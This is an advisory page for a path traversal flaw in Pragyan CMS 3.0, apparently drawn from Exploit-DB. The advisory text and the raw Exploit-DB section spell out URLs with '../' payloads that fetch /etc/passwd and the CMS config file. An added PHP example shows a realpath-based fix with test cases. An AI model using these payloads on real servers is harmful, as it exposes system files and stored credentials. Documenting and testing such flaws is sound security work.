Vendor: Pragyan CMS
By: Or4nG.M4n
CVSS: 7.5 (HIGH)
Remote File Disclosure
CWE: 22
Product Name: Pragyan CMS
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:pragyan:pragyan_cms:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Pragyan CMS v 3.0 => [Remote File Disclosure]

The vulnerability is a path traversal (CWE-22) in download.lib.php, line 16, and index.php, line 234, both of which handle the 'fileget' request parameter ($_GET['fileget']). An attacker can exploit it by sending a crafted HTTP request with 'fileget' set to '../../../../../../../../../../../../ etc/passwd . boot.ini' to download the file. Similarly, an attacker can download the config file by setting 'fileget' to '../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php' or '../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php'.

Mitigation:

The vendor should patch the vulnerable code and restrict access to the vulnerable files.
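
One way to make "patch the vulnerable code" concrete, as an added example (not Pragyan CMS code and not part of the advisory): resolve the requested name with realpath() and serve it only if it stays inside a single download directory. The function name resolve_download, the uploads/ directory and the sample files are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not taken from Pragyan CMS.
// Maps a user-supplied name onto a fixed download directory and returns
// null for anything that resolves outside it.
function resolve_download(string $baseDir, string $requested): ?string
{
    // PHP path functions reject NUL bytes; refuse them (and empty names) up front.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // download directory missing
    }
    // realpath() collapses "../" and resolves symlinks; false means no such file.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator, so a sibling such
    // as "uploads-old" cannot pass as being inside "uploads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Self-check on constructed files in a temporary directory.
$root = sys_get_temp_dir() . '/dl_demo_' . getmypid();
mkdir($root . '/uploads', 0700, true);
file_put_contents($root . '/uploads/report.txt', 'public');
file_put_contents($root . '/config.inc.php', 'private'); // outside uploads/

$cases = [
    'report.txt'                   => true,   // legitimate download
    '../config.inc.php'            => false,  // one level up
    '../../../../../../etc/passwd' => false,  // deep traversal
    "report.txt\0.php"             => false,  // NUL byte
    'missing.txt'                  => false,  // nonexistent file
];
foreach ($cases as $name => $allowed) {
    $got = resolve_download($root . '/uploads', $name) !== null;
    printf("%-34s %s\n", json_encode($name), $got === $allowed ? 'ok' : 'MISMATCH');
}

unlink($root . '/uploads/report.txt');
unlink($root . '/config.inc.php');
rmdir($root . '/uploads');
rmdir($root);
```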
Source

Exploit-DB raw data:

Title: Pragyan CMS v 3.0 => [Remote File Disclosure]
Author: Or4nG.M4n
Download: http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2

vuln: download.lib.php line 16
vuln: index.php line 234

$_GET['fileget']
 
exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini

Download Config file 
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php